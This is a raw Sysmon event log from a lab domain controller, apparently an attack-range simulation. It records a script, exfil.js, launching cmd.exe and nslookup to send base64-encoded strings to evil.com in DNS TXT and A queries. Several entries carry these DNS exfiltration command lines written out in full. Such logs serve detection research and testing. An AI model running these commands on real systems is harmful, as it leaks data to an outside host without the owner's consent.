14:16:19.383{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwtbbh.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-17B3-629A-0C3F-000000005F02}37643140C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-0D3F-000000005F02}8072C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-0D3F-000000005F02}8072C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-17B3-629A-0B3F-000000005F02}77727084C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-0D3F-000000005F02}8072C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.367{2E1864BB-17B3-629A-0D3F-000000005F02}8072C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-0B3F-000000005F02}7772C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwtbbh.tmp 2>&1 10341000x8000000000000000197119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.336{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-0C3F-000000005F02}3764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.336{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-0C3F-000000005F02}3764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.320{2E1864BB-17B3-629A-0C3F-000000005F02}37643140C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-0B3F-000000005F02}7772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.304{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-0C3F-000000005F02}3764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-0B3F-000000005F02}7772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-17A1-629A-783D-000000005F02}55526076C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-0B3F-000000005F02}7772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.296{2E1864BB-17B3-629A-0B3F-000000005F02}7772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwtbbh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.282{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkxmif.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-17B3-629A-093F-000000005F02}46165184C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-0A3F-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-0A3F-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.221{2E1864BB-17B3-629A-083F-000000005F02}37441788C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-0A3F-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.231{2E1864BB-17B3-629A-0A3F-000000005F02}2900C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-083F-000000005F02}3744C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkxmif.tmp 2>&1 354300x8000000000000000197099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.606{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52396- 354300x8000000000000000197098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52395- 354300x8000000000000000197097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52394- 354300x8000000000000000197096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.494{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52393- 354300x8000000000000000197095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52392- 354300x8000000000000000197094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52391- 354300x8000000000000000197093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.391{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52390- 354300x8000000000000000197092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.243{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52389- 